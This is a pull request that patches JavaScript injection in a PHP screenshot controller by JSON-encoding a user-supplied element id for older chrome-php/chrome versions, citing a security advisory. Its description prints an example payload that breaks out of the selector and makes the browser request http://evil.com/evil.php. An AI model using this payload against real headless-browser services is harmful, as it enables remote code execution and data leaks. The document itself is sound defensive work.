### PR TITLE
fix javascript injection

### DIFF
--- a/app/Http/Controllers/ScreenShotController.php
+++ b/app/Http/Controllers/ScreenShotController.php
@@ -44,7 +44,12 @@ class ScreenShotController extends Controller
 
             // find and click at an element with given id
             if ($request->filled('cid')) {
-                $page->mouse()->find('#' . $request->cid, 1)->click();
+                $selector = '#' . $request->cid;
+                if (\version_compare(\Composer\InstalledVersions::getVersion('chrome-php/chrome'), '1.14.0', '<')) {
+                    // workaround https://github.com/chrome-php/chrome/security/advisories/GHSA-3432-fmrf-7vmh
+                    $selector = \json_encode($selector, \JSON_THROW_ON_ERROR);
+                }
+                $page->mouse()->find($selector, 1)->click();
             }
 
             // screenshot


### PR DESCRIPTION
workaround https://github.com/chrome-php/chrome/security/advisories/GHSA-3432-fmrf-7vmh

due to a bug in the chrome-php/chrome library, previously, javascript could be injected into cid like
```
$request->cid =<<<'PAYLOAD'
"+(function(){
xhr=new XMLHttpRequest();
xhr.open('GET','http://evil.com/evil.php',false);
xhr.send();
return "real-cid-here";
})()+"
PAYLOAD;
```
and `$page->mouse->find('#' . $this->cid)` would actually execute the javascript and ping http://evil.com/evil.php